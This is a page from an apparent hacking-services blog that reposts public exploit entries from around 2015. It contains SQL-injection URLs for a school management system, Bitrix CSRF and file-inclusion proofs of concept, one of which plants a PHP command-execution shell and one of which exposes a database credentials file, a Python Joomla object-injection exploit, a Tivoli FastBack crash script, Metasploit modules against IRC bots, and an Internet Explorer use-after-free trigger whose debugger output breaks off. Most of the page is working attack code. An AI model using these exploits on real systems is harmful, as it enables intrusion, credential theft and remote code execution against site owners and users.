Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863178598

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/64707/info
        
Command School Student Management System is prone to the following security vulnerabilities:
        
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
        
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
        
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
       
Command School Student Management System is prone to the following security vulnerabilities:
       
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
       
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
       
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
      
Command School Student Management System is prone to the following security vulnerabilities:
      
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
      
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
      
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
     
Command School Student Management System is prone to the following security vulnerabilities:
     
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
     
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
     
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
    
Command School Student Management System is prone to the following security vulnerabilities:
    
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
    
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
    
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
   
Command School Student Management System is prone to the following security vulnerabilities:
   
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
   
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
   
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
 
Command School Student Management System is prone to the following security vulnerabilities:
 
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
 
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
 
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info
  
Command School Student Management System is prone to the following security vulnerabilities:
  
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
  
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
  
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64707/info

Command School Student Management System is prone to the following security vulnerabilities:

1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability

Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.

Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
HireHackking 
source: https://www.securityfocus.com/bid/64705/info

The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. 

http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
HireHackking 
#!/usr/bin/python
#         
################################################################################
#
#            Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
#                   Invalid Pointer Dereference
#             Date: 14 December 2015
#           Author: Gianni Gnesa (gnix) 
#
#  Vendor Homepage: http://www.ibm.com/
#    Software Name: IBM Tivoli Storage Manager FastBack 
# Software Version: 5.5.4.2 (x86)
#    Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
#                   - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy" 
#                     (Version 5.5.4.2, Size: 120.7 MB)
#
#        Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Crash:
# ======
#
# (f60.654): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=01bf4fb8 ecx=41414141 edx=41414141 esi=01bf4fb8 edi=00000000
# eip=0063d84a esp=01dce0c8 ebp=01dce0cc iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# FastBackServer!CLocation::GetLocationParams+0xa:
# 0063d84a 8b4004          mov     eax,dword ptr [eax+4] ds:0023:41414145=????????
#
################################################################################

import sys
import time
import socket
from struct import pack


def create_pkt(opcode, p1="", p2="", p3=""):

	# psAgentCommand (0x30 bytes)
	buf = "\x44" * 0xC
	buf+= pack("<L", opcode)			# opcode

	buf+= pack("<i", 0x0)				# 1st memcpy: offset (in psCommandBuffer.data) for Src field 
	buf+= pack("<i", len(p1)) 			# 1st memcpy: size field
	buf+= pack("<i", len(p1))			# 2nd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p2)) 			# 2nd memcpy: size field
	buf+= pack("<i", len(p1) + len(p2))	# 3rd memcpy: offset (in psCommandBuffer.data) for Src field
	buf+= pack("<i", len(p3)) 			# 3rd memcpy: size field

	buf+= "\x44\x44\x44\x44"
	buf+= "\x44\x44\x44\x44"

	# psCommandBuffer
	buf+= p1
	buf+= p2
	buf+= p3
	
	# buf len - 4 because the packet length is not included
	buf = pack(">i", len(buf)-4) + buf
	
	return buf
	
	
def main():
	if len(sys.argv) != 2:
		print "Usage: %s <ip_address>\n" % sys.argv[0]
		sys.exit(1)

	server = sys.argv[1]
	port = 11460

	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((server, port))
	
	pkt = create_pkt(	opcode = 0x537,
						p1 = "A" * 24000,
						p2 = "B" * 24000,
						p3 = "C" * 1000 )

	s.send(pkt)	
	s.close()
    
	print "[+] Packet sent."
	sys.exit(0) 
	
	
if __name__ == "__main__":
	main()
HireHackking 
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 25, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical 
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.

Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.
 
The vulnerability exists due to insufficient filtration of "work[]" HTTP POST parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.

A simple exploit below will include and execute "/tmp/file" file:

<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/file]" value="1">
<input value="submit" id="btn" type="submit" />
</form>


In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious "NAME" value:


<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]" value="1">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>



-----------------------------------------------------------------------------------------------

Solution:

Update to bitrix.mpbuilder module 1.0.12

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
Advisory ID: HTB23278
Product: bitrix.xscan Bitrix module
Vendor: Bitrix
Vulnerable Version(s): 1.0.3 and probably prior
Tested Version: 1.0.3
Advisory Publication:  November 18, 2015  [without technical details]
Vendor Notification: November 18, 2015 
Vendor Patch: November 24, 2015 
Public Disclosure: December 9, 2015 
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2015-8357
Risk Level: Medium 
CVSSv3 Base Score: 4.2 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.xscan Bitrix module, intended to discover and neutralize malware on the website. The vulnerability can be exploited to change extension of arbitrary PHP files on the target system and gain access to potentially sensitive information, such as database credentials, or even make the whole website inaccessible.

The vulnerability exists due to absence of filtration of directory traversal characters (e.g. "../") passed via "file" HTTP GET parameter to "/bitrix/admin/bitrix.xscan_worker.php" script. A remote authenticated attacker can upload a file with malicious contents, pass this file to vulnerable script along with name of the file to rename. As a result, the vulnerable script will change extension of the given file from ".php" to ".ph_”. These actions will make the web server treat this file as a text file and display its contents instead of executing it. 

To demonstrate the vulnerability follow the steps below:

1) Chose arbitrary image file and modify it by appending eval() PHP function at the end of the file. We need this, because the file will be renamed only if it contains potentially dangerous content.
2) Upload this file using standard CMS functionality, for example as an image for your profile.
3) Obtain the name of the image you have uploaded. You can do it using your profile. In our example the images had the following path: "/upload/main/77f/image.jpg".
4) Construct the exploit payload using path to the image and the file you want to view. As a demonstration we chose to view contents of "/bitrix/.settings.php" file, since it contains database credentials:

file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php

5) Use the following PoC code to reproduce the vulnerability:

<img src="http://[host]/admin/bitrix.xscan_worker.php?action=prison&file=/upload/main/77f/image.jpg../../../../../bitrix/.settings.php">

As a result, the vulnerable script will rename "/bitrix/.settings.php" into "/bitrix/.settings.ph_", which makes it readable by anonymous users:

http://[host]/bitrix/.settings.ph_

Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. Steps 1-4 do not require administrative or special privileges and can be performed by any user, who can register at the website or upload an image. 

-----------------------------------------------------------------------------------------------

Solution:

Update to bitrix.xscan module 1.0.4

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23278 - https://www.htbridge.com/advisory/HTB23278 - Path Traversal and CSRF in bitrix.xscan Bitrix Module
[2] bitrix.xscan - https://marketplace.1c-bitrix.ru/solutions/bitrix.xscan/ - Module for Bitrix CMS that can detect Trojans on your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
'''
   Simple PoC for Joomla Object Injection.
   Gary @ Sec-1 ltd
   http://www.sec-1.com/
'''
 
import requests #  easy_install requests
 
def get_url(url, user_agent):
 
    headers = {
    'User-Agent': user_agent
    }
    cookies = requests.get(url,headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)    
    return response
   
def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
 
    return encoded[:-1]
 
 
def generate_payload(php_payload):
 
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
 
    terminate = '\xf0\xfd\xfd\xfd';
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
 
    return exploit_template
 
 
 
pl = generate_payload("system('touch /tmp/fx');")
 
print get_url("http://172.31.6.242/", pl)
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
      'Description'    => %q{
          This module allows remote command execution on an IRC Bot developed by xdh.
          This perl bot was caught by Conor Patrick with his shellshock honeypot server
          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
          Thayer also found this script which has a description of LinuxNet perlbot.

          The bot answers only based on the servername and nickname in the IRC message
          which is configured on the perl script thus you need to be an operator on the IRC
          network to spoof it and in order to exploit this bot or have at least the same ip
          to the config.
        },
      'Author'         =>
        [
          #MalwareMustDie
          'Jay Turla', # msf
          'Conor Patrick', # initial discovery and botnet analysis for xdh
          'Matt Thayer' # initial discovery for LinuxNet perlbot
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
          [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'  =>
        [
          [ 'xdh Botnet / LinuxNet perlbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 04 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport}  - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    if !res =~ /353/ && !res =~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock,msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  def xdh_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if !res =~ /353/ && !res =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    xdh_command(sock)

    quit(sock)
    disconnect
  end

end
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Legend Perl IRC Bot Remote Code Execution',
      'Description'    => %q{
          This module exploits a remote command execution on the Legend Perl IRC Bot .
          This bot has been used as a payload in the Shellshock spam last October 2014.
          This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
          UDP flooding, the ability to remove system logs, and ability to gain root, and
          VNC scanning.

          Kevin Stevens, a Senior Threat Researcher at Damballa  has uploaded this script
          to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
        },
      'Author'         =>
        [
          'Jay Turla' # msf and initial discovery
          #MalwareMustDie
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '121681' ],
          [ 'EDB', '36836' ],
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'  =>
        [
          [ 'Legend IRC Bot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 27 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    if !res =~ /353/ && !res =~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock,msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  def legend_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if !res =~ /353/ && !res =~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    legend_command(sock)

    quit(sock)
    disconnect
  end

end
HireHackking 
<!--
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/               research(at)bluefrostsecurity.de
BFS-SA-2015-003                                                 10-December-2015
________________________________________________________________________________

Vendor:                 Microsoft, http://www.microsoft.com
Affected Products:      Internet Explorer
Affected Version:       IE 11
Vulnerability:          MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID:                 CVE-2015-6152
________________________________________________________________________________

I.   Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.

________________________________________________________________________________

II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:
-->

<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
    small{ -ms-block-progression: lr; -ms-filter: "vv"; }
</style>
<script>
    function trigger() { document.execCommand("JustifyLeft"); }
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>

<!--
With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300  test    dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????

0:007> !heap -p -a @eax
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    9b01f04:          9b09000             2000
    748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
    77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
    77dc2b65 ntdll!RtlFreeHeap+0x00000142
    758814ad kernel32!HeapFree+0x00000014
    6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
    6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
    6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
    address 09b09e90 found in
